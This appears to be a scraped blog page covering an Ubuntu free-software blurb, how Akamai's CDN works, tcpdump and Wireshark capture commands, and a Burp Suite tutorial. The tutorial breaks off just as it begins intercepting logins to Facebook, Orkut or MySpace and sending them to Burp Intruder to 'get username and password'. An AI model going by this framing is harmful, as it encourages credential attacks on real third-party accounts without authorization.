"A person with ubuntu is open and available to others, affirming of others, does not feel threatened that others are able and good, for he or she has a proper self-assurance that comes from knowing that he or she belongs in a greater whole and is diminished when others are humiliated or diminished, when others are tortured or oppressed."
 -- Archbishop Desmond Tutu

As a platform based on Free software, the Ubuntu operating system brings the spirit of ubuntu to the software world.

The Ubuntu project is entirely committed to the principles of free software development; people are encouraged to use free software, improve it,and pass it on.

"Free software" doesn't mean that you shouldn't have to pay for it (although Ubuntu is committed to being free of charge as well). It means that you should be able to use the software in any way you wish: the code that makes up free software is available for anyone to download, change, fix, and use in any way. Alongside ideological benefits, this freedom also has technical advantages: when programs are developed, the hard work of others can be used and built upon. With non-free software, this cannot happen and when programs are developed, they have to start from scratch. For this reason the development of free software is fast, efficient and exciting!

what is akamai technologies?

 

 

While tracing my network i came across this akamaitechnologies,i am getting constantly packets from this website server and then finally i googled it and came to known about this company.

 

The company was founded in 1998 by then-MIT graduate student Daniel M. Lewin, and MIT Applied Mathematics professor Tom Leighton.

Akamai transparently mirrors content—sometimes all site content including HTML, CSS, and software downloads, and sometimes just media objects such as audio, graphics, animation, and video—from customer servers. Though the domain name (but not subdomain) is the same, the IP address points to an Akamai server rather than the customer's server. The Akamai server is automatically picked depending on the type of content and the user's network location.

The benefit is that users can receive content from whichever Akamai server is close to them or has a good connection, leading to faster download times and less vulnerability to network congestion or outages.

In addition to content caching, Akamai provides services which accelerate dynamic and personalized content, J2EE-compliant applications, and streaming media to the extent that such services frame a localized perspective

 

751px-Akamaiprocess

 

 

In the diagram shown, we see an "Akamaized" website; this simply means that certain content within the website (usually media objects such as audio, graphics, animation, video) will not point to servers owned by the original website, in this case ACME, but to servers owned by Akamai. It is important to note that even though the domain name is the same, namely www.acme.com and image.acme.com, the ip address (server) that image.acme.com points to is actually owned by Akamai and not ACME.

Step 1. The client's browser requests the default web page at the ACME site. The site returns the web page index.html.

Step 2. If the html code is examined you can see that there is a link to an image hosted on the Akamai owned server image.acme.com.

Step 3. As your web browser parses the html code it pulls the image object bigpicture.jpg from image.acme.com

Using tcpdump and wireshark to capture packets on a Linux system


The following command will capture all packets on the eth0 network interface and log them to a file called packets.tcpdump.
tcpdump -i eth0 -s 0 -U -w packets.tcpdump
tcpdump will continue to run in the foreground while you generate the network activity.  When you're done, press CTRL+C to stop tcpdump.  Note that running tcpdump in this manner could have an adverse effect on network performance, so you should not leave this running in a production environment.
Capturing all packets also has a potential to use a lot of disk space if your network is busy.  If you're having trouble finding the traffic you want because the dump is too large, consider passing additional arguments to tcpdump to filter the types of packets that are captured, e.g., only packets from a certain IP address or only packets on a certain port.
The following command will only capture TCP packets destined for or originating from port 80.
tcpdump -i eth0 -s 0 -U -w port-80-packets.tcpdump tcp port 80
Of course, the downside to filtering the dump at capture-time is that you may miss something that helps you debug the problem you're encountering.  If you can afford the disk space and your network is not that busy, it may be better to capture all packets and just use a view filter in Wireshark to help you find what you're looking for.

To install wireshark in ubuntu use following command:

sudo apt-get install wireshark

to open wireshark press alt+f2

and give following code in run section:

gksudo wireshark

Screenshot-3

wireshark is best utility to capture packets i had ever came across ,  i recommend it for every linux noob.

how to use burp suite?

What is the Burp Suite?
Burp Suite is an integrated platform for attacking web applications. It contains all of the Burp tools with numerous interfaces between them designed to facilitate and speed up the process of attacking an application. All tools share the same robust framework for handling HTTP requests, persistence, authentication, upstream proxies, logging, alerting and extensibility.
Burp Suite allows you to combine manual and automated techniques to enumerate, analyse, scan, attack and exploit web applications. The various Burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another.
Source: http://www.portswigger.net/suite/
The Burp Suite is made up of tools (descriptions take from the Port Swigger website):
Proxy: Burp Proxy is an interactive HTTP/S proxy server for attacking and testing web applications. It operates as a man-in-the-middle between the end browser and the target web server, and allows the user to intercept, inspect and modify the raw traffic passing in both directions.
Spider: Burp Spider is a tool for mapping web applications. It uses various intelligent techniques to generate a comprehensive inventory of an application’s content and functionality.
Scanner: Burp Scanner is a tool for performing automated discovery of security vulnerabilities in web applications. It is designed to be used by penetration testers, and to fit in closely with your existing techniques and methodologies for performing manual and semi-automated penetration tests of web applications.
Intruder: Burp Intruder is a tool for automating customised attacks against web applications.
Repeater: Burp Repeater is a tool for manually modifying and reissuing individual HTTP requests, and analysing their responses. It is best used in conjunction with the other Burp Suite tools. For example, you can send a request to Repeater from the target site map, from the Burp Proxy browsing history, or from the results of a Burp Intruder attack, and manually adjust the request to fine-tune an attack or probe for vulnerabilities.
Sequencer: Burp Sequencer is a tool for analysing the degree of randomness in an application’s session tokens or other items on whose unpredictability the application depends for its security.
Decoder: Burp Decoder is a simple tool for transforming encoded data into its canonical form, or for transforming raw data into various encoded and hashed forms. It is capable of intelligently recognising several encoding formats using heuristic techniques.
Enabling the Burp Suite Proxy
To begin using the Burp Suite to test our example web application we need configure our web browser to use the Burp Suite as a proxy. The Burp Suite proxy will use port 8080 by default but you can change this if you want to.
You can see in the image below that I have configured Firefox to use the Burp Suite proxy for all traffic
FF-PRoxy
When you open the Burp Suite proxy tool you can check that the proxy is running by clicking on the options tab
Burp13-560x446

You can see that the proxy is using the default port:
Burp2-560x446

The proxy is now running and ready to use. You can see that the proxy options tab has quite a few items that we can configure to meet our testing needs
Now the main phase we login to a facebook,orkut,myspace or any other website’s account and try to get username and password using burp..lets see how i do it …let the Hacking begin::{its only for study purpose dont misuse it}

To do this we must ensure that the Burp Suite proxy is configured to intercept our requests:
Burp7-560x446

With the intercept enabled we will submit the logon form and send it to the intruder as you can see below:
Burp8-560x446
Burp9-560x446
The Burp Suite will send our request to the intruder tool so we can begin our testing. You can see the request in the intruder tool below:
Burp10-560x446
The tool has automatically created payload positions for us. The payload positions are defined using the § character, the intruder will replace the value between two § characters with one of our test inputs.
The positions tab which is shown in the image above has four different attack types for you to choose from (definitions taken from http://www.portswigger.net/intruder/help.html) :